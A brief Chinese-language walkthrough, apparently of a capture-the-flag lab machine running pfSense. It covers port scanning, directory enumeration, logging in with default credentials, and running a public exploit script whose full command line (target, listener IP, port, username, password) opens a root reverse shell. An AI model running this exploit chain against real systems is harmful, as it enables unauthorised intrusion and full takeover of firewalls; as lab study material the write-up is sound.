nmap
80和443都是网页端口
打开,进入
是一个登录框。pfsense,防火墙&路由器管理软件。这多半是个pfsense安全漏洞的考点
继续信息搜集
dirbuster扫。后缀加多一些比如txt,不要只光扫php文件。可能有robots或类似的txt记录有价值的信息。
找到了登录信息文件
这里密码可不是company defaults ,是pfsense公司默认的登录密码。
还得搜下默认账号密码是什么
默认账户密码
ok,进入,搞定
看到版本信息
针对这个版本,该利用什么漏洞。继续搜
那个py可用。尝试使用。根据提示
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.57 --lport 1234 --username rohit --password pfsense
另一边本机打开监听,收到,直接是root权限,搞定